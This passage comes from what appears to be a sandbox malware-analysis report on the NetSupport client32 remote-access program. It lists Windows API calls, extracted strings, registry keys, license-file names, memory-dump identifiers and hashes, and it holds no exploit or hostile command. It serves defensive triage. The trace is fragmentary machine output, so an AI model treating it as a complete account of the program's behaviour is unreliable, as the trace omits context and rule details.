                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028925
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                        • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                        • API String ID: 512045693-419896573
                                                                                        • Opcode ID: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                                        • Instruction ID: fa2db278f690afc2f691dfd055e17c1d40a227d38623a0fdca6da18cc7b7963a
                                                                                        • Opcode Fuzzy Hash: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                                        • Instruction Fuzzy Hash: 4F41B679E40228ABD714CF94DC89FE6B7A8EB45709F0081A5F95497284DAB0AD45CFA0
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(PCIINV.DLL), ref: 11086115
                                                                                          • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                          • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                          • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                          • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,774E42C0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                                        • GetProcAddress.KERNEL32(00000000,GetInventory,B24479DC,020249C8,020249B8,?,00000000,1118368C,000000FF,?,11032002,020249C8,00000000,?,?,?), ref: 1108613B
                                                                                        • GetProcAddress.KERNEL32(00000000,Cancel,?,11032002,020249C8,00000000,?,?,?), ref: 1108614F
                                                                                        • GetProcAddress.KERNEL32(00000000,GetInventoryEx,?,11032002,020249C8,00000000,?,?,?), ref: 11086163
                                                                                        • wsprintfA.USER32 ref: 110861EB
                                                                                        • wsprintfA.USER32 ref: 11086202
                                                                                        • wsprintfA.USER32 ref: 11086219
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 1108636A
                                                                                          • Part of subcall function 11085D50: CloseHandle.KERNEL32(?), ref: 11085D68
                                                                                          • Part of subcall function 11085D50: CloseHandle.KERNEL32(?), ref: 11085D7B
                                                                                          • Part of subcall function 11085D50: CloseHandle.KERNEL32(?), ref: 11085D8E
                                                                                          • Part of subcall function 11085D50: FreeLibrary.KERNEL32(00000000,756F1222,?,?,11086390,?,11032002,020249C8,00000000,?,?,?), ref: 11085DA1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                        • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                        • API String ID: 4263811268-2492245516
                                                                                        • Opcode ID: 79300dc539d0ee21f2e412ecc2afba85115f3a9800858e180ea8acaac6af75d4
                                                                                        • Instruction ID: cc6116ccc6b21cbbfdc815c98c7fdad09c9720580d605ccac26d10648bac74b6
                                                                                        • Opcode Fuzzy Hash: 79300dc539d0ee21f2e412ecc2afba85115f3a9800858e180ea8acaac6af75d4
                                                                                        • Instruction Fuzzy Hash: 5471CDB4E44709ABEB10CF79DC51BDAFBE8EB48304F00456AF95AD7280EB75A500CB94
                                                                                        APIs
                                                                                        • OpenMutexA.KERNEL32 ref: 11030CB3
                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 11030CCA
                                                                                        • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030D6C
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11030D82
                                                                                        • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                                        • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                                        • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                        • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                        • API String ID: 2061479752-1320826866
                                                                                        • Opcode ID: 377beac14d7431bca268e8f4951fbe1a33445769506454ec8276ef22a8bf9555
                                                                                        • Instruction ID: 041cc1499d836288ec3ce923e3d2bdfde1aeba2e10a7f52041b4b34688633552
                                                                                        • Opcode Fuzzy Hash: 377beac14d7431bca268e8f4951fbe1a33445769506454ec8276ef22a8bf9555
                                                                                        • Instruction Fuzzy Hash: 64610974E1631A9FEB15DBB08D89B9DF7B4AF4070DF0040A8E915A72C5EF74AA40CB51
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 110F618F
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 110F61D1
                                                                                        • GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 110F61DE
                                                                                        • ProcessIdToSessionId.KERNEL32(00000000,00000000), ref: 110F61F0
                                                                                        • SetLastError.KERNEL32(00000078), ref: 110F6203
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 110F620C
                                                                                        • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 110F6215
                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000008,11189C68), ref: 110F6228
                                                                                        • GetTokenInformation.ADVAPI32(11189C68,0000000C(TokenIntegrityLevel),111EA880,00000004,?), ref: 110F6247
                                                                                        • CloseHandle.KERNEL32(11189C68), ref: 110F626A
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 110F6271
                                                                                        • FreeLibrary.KERNEL32(?), ref: 110F627B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process$CloseCurrentHandleLibraryOpenToken$AddressErrorFreeInformationLastLoadProcSession
                                                                                        • String ID: Kernel32.dll$ProcessIdToSessionId
                                                                                        • API String ID: 2607481436-2825297712
                                                                                        • Opcode ID: e865c6473b299d360233d20d6969acab5fbd0a0a238613220fb6c2a45ad82976
                                                                                        • Instruction ID: 420031f46cca3c2d8ff2aa46f1ed04d10c13eca04bac1e8faae0ba62584c02a7
                                                                                        • Opcode Fuzzy Hash: e865c6473b299d360233d20d6969acab5fbd0a0a238613220fb6c2a45ad82976
                                                                                        • Instruction Fuzzy Hash: 5C4119B5E416299FDB15DFE9DD89AAEFBB8FB08B04F10052AF421E3644D77099018B90
                                                                                        APIs
                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102E368,00000000,B24479DC,?,00000000,00000000), ref: 1102D594
                                                                                        • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102D5AA
                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102D5BE
                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5C5
                                                                                        • Sleep.KERNEL32(00000032), ref: 1102D5D6
                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5E6
                                                                                        • Sleep.KERNEL32(000003E8), ref: 1102D632
                                                                                        • CloseHandle.KERNEL32(?), ref: 1102D65F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                        • String ID: >$IKS.LIC$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                        • API String ID: 83693535-1096744297
                                                                                        • Opcode ID: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                                        • Instruction ID: 28ce5055a28a8f5180363266ffebbc24acbf765ee5ceddae65e6c679609cb99b
                                                                                        • Opcode Fuzzy Hash: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                                        • Instruction Fuzzy Hash: 3DB18F75E012259BEB25CF64CC84BEDB7B5BB49708F5041E9E919AB380DB70AE80CF50
                                                                                        APIs
                                                                                          • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CBA5
                                                                                        • GetTickCount.KERNEL32 ref: 1102CBCA
                                                                                          • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                                        • GetTickCount.KERNEL32 ref: 1102CCC4
                                                                                          • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                          • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CDBC
                                                                                        • CloseHandle.KERNEL32(?), ref: 1102CDD8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                        • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                        • API String ID: 596640303-1725438197
                                                                                        • Opcode ID: 4b4be5afc825d4046c7b89c8e65dc4458f3d4dc60d274e6f777fc83c6e95621d
                                                                                        • Instruction ID: dd5538bcf42f02d8fc6af97e821dff418cbfa7b7de554536dce4014f8caac367
                                                                                        • Opcode Fuzzy Hash: 4b4be5afc825d4046c7b89c8e65dc4458f3d4dc60d274e6f777fc83c6e95621d
                                                                                        • Instruction Fuzzy Hash: 62817E34E0021A9BDF04DBE4CD90FEEF7B5AF55348F508259E82667284DB74BA05CBA1
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?), ref: 1106227A
                                                                                          • Part of subcall function 11061C60: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?), ref: 11061C9C
                                                                                          • Part of subcall function 11061C60: RegEnumValueA.ADVAPI32 ref: 11061CF4
                                                                                        • RegEnumKeyExA.ADVAPI32 ref: 110622CB
                                                                                        • RegEnumKeyExA.ADVAPI32 ref: 11062385
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 110623A1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Enum$Open$CloseValue
                                                                                        • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                        • API String ID: 2823542970-1528906934
                                                                                        • Opcode ID: 30251da02dba7c4869162fd17402fcc4328921fd941fb637224b8cd017035ea6
                                                                                        • Instruction ID: 91282df486796d8d45fa06834b6704f4eef725291cd5fd64ae30f86ab301b8e1
                                                                                        • Opcode Fuzzy Hash: 30251da02dba7c4869162fd17402fcc4328921fd941fb637224b8cd017035ea6
                                                                                        • Instruction Fuzzy Hash: F6415E79A0022D6BD724CF51DC81FEAB7BCEF58748F1041D9EA49A6140DBB06E85CFA1
                                                                                        APIs
                                                                                          • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                        • GetTickCount.KERNEL32(00000000), ref: 111385E2
                                                                                          • Part of subcall function 11096D90: CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                                          • Part of subcall function 11096D90: CLSIDFromProgID.OLE32(HNetCfg.FwMgr,?), ref: 11096DBE
                                                                                          • Part of subcall function 11096D90: CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?), ref: 11096DDB
                                                                                          • Part of subcall function 11096D90: CoUninitialize.OLE32 ref: 11096DF9
                                                                                        • GetTickCount.KERNEL32 ref: 111385F1
                                                                                        • _memset.LIBCMT ref: 11138633
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11138649
                                                                                        • _strrchr.LIBCMT ref: 11138658
                                                                                        • _free.LIBCMT ref: 111386AA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                        • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                        • API String ID: 711243594-1270230032
                                                                                        • Opcode ID: b524ada246f286939a9f3e3c55ef438c10a10b9aa8b6a7d54b94cd4cbe5357d5
                                                                                        • Instruction ID: 5891752c4c55aadc8c036c0ba7fa863b534ef4ea4707a2085efa3f6ff011156f
                                                                                        • Opcode Fuzzy Hash: b524ada246f286939a9f3e3c55ef438c10a10b9aa8b6a7d54b94cd4cbe5357d5
                                                                                        • Instruction Fuzzy Hash: D8419C7AE0012E9BD710DB755C85FDAF778EB5531CF0001B9EC0997284EAB1A944CBE1
                                                                                        APIs
                                                                                          • Part of subcall function 11146010: _memset.LIBCMT ref: 11146055
                                                                                          • Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                          • Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                          • Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                          • Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                          • Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                        • AdjustWindowRectEx.USER32(11142328,00CE0000,00000001,00000001), ref: 11134DD7
                                                                                        • LoadMenuA.USER32 ref: 11134DE8
                                                                                        • GetSystemMetrics.USER32(00000021,?,110F8239,00000001,11142328,_debug), ref: 11134DF9
                                                                                        • GetSystemMetrics.USER32(0000000F,?,110F8239,00000001,11142328,_debug), ref: 11134E01
                                                                                        • GetSystemMetrics.USER32(00000004,?,110F8239,00000001,11142328,_debug), ref: 11134E07
                                                                                        • GetDC.USER32(00000000), ref: 11134E13
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A,?,110F8239,00000001,11142328,_debug), ref: 11134E1E
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 11134E2A
                                                                                        • CreateWindowExA.USER32 ref: 11134E7F
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,110F8239,00000001,11142328,_debug), ref: 11134E87
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                        • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                        • API String ID: 1594747848-1114959992
                                                                                        • Opcode ID: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
